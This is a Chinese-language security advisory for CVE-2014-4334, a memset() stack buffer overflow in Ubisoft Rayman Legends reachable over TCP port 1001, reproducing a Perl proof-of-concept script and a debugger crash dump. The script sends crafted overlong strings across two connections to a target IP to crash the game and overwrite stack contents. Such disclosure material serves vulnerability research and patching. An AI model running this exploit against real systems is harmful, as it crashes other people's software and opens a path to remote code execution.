Ubisoft Rayman Legends 'memset()'函数栈缓冲区溢出漏洞

发布日期:2014-06-17
更新日期:2014-08-04

受影响系统:
Ubisoft Entertainment Rayman Legends < 1.3.140380
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 68080
 CVE(CAN) ID: CVE-2014-4334
 
Ubisoft Rayman Legends是Ubisoft Montpellier开发的、Ubisoft发行的2013平台游戏。
 
Rayman Legends 1.2.103716, 1.1.100477, 1.0.95278版本通过TCP端口1001的原始套接字连接处理进站数据时,memset()存在边界错误,这可使远程攻击者在第二次连接时发送超长的字符串造成栈缓冲区溢出,成功利用后可允许受影响节点上执行任意代码。
 
<*来源:Gjoko Krstic (liquidworm@gmail.com)
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
 #
 #
 # Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
 #
 #
 # Vendor: Ubisoft Entertainment S.A.
 # Product web page:
 # Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
 #
 # Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
 # Montpellier and published by Ubisoft. It is the fifth main title in
 # the Rayman series and the direct sequel to the 2011 game Rayman Origins.
 # The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
 # Wii U, and PlayStation Vita platforms in August and September 2013.
 # PlayStation 4 and Xbox One versions were released in February 2014.
 #
 # Desc: The vulnerability is caused due to a memset() boundary error in the
 # processing of incoming data thru raw socket connections on TCP port 1001,
 # which can be exploited to cause a stack based buffer overflow by sending a
 # long string of bytes on the second connection. Successful exploitation could
 # allow execution of arbitrary code on the affected node.
 #
 # ===========================================================================
 #
 # (15a8.f0c): Access violation - code c0000005 (first chance)
 # First chance exceptions are reported before any exception handling.
 # This exception may be expected and handled.
 # eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000
 # eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0        nv up ei pl nz na pe cy
 # cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b            efl=00010207
 # MSVCR100!memset+0x5f:
 # 715e26df f3ab            rep stos dword ptr es:[edi]
 # 0:028> d esp
 # 0f16dcec  42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00  BBBBd...........
 # 0f16dcfc  42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c  BBBBBBBB"...PBK.
 # 0f16dd0c  90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00  .C......(.......
 # 0f16dd1c  50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f  PBK.l.......L...
 # 0f16dd2c  e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07  ....H.......<...
 # 0f16dd3c  3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41  <......u....AAAA
 # 0f16dd4c  41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
 # 0f16dd5c  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
 #
 # ===========================================================================
 #
 #
 # Tested on: Microsoft Windows 7 Professional SP1 (EN)
 #            Microsoft Windows 7 Ultimate SP1 (EN)
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                            @zeroscience
 #
 #
 # Advisory ID: ZSL-2014-5187
 # Advisory URL:
 #
 #
 # 22.05.2014
 #
#
 
use IO::Socket;
 
print
 "
 @****************************************@
 |                                        |
 | Ubisoft Rayman Legends BoF PoC Script  |
 |                                        |
 |              ZSL-2014-5187            |
 |                                        |
 @****************************************@
 ";
 
$ip="$ARGV[0]";
 
if($#ARGV!=0)
 {
    print "\n\n\x20\x20\x1c\x20Usage: $0 <ipaddr>\n\n";
    exit();
 }
 
print "\n\x20\x1c\x20Target: $ip\n";
 print "\x20\x1c\x20Initiating first connection\n";
 
sleep 2;
 $conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
 if(!$conn1)
 {
    print "\n\x20*** Connection error!\n";
    exit();
 } else
  {
      print "\x20\x1c\x20Connection established\n";
  }
 
print $conn1 "\x44"x36;
 print $conn1 "\x45\x45\x45\x45";
 print $conn1 "\x46"x2000; # SC contain
 print "\x20\x1c\x20Payload sent\n";
 close $conn1;
 print "\x20\x1c\x20First stage completed\n\x20\x1c\n";
 print "\x20\x1c\x20Initiating second connection\n";
 
sleep 2;
 $conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
 if(!$conn2)
 {
    print "\n\x20*** Connection error!\n";
    exit();
 } else
  {
      print "\x20\x1c\x20Connection established\n";
  }
 
print $conn2 "\x41" x 16;
 print $conn2 "\x42\x42\x42\x42"; # ESP ->
 print $conn2 "\x43"x1000; # SC contain
 print "\x20\x1c\x20Payload sent\n";
 print "\x20\x1c\x20Second stage completed\n";
 close $conn2;
 print "\x20\x1c\x20t00t!\n";

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/f6d804ed280938a3422b129531ebd695.html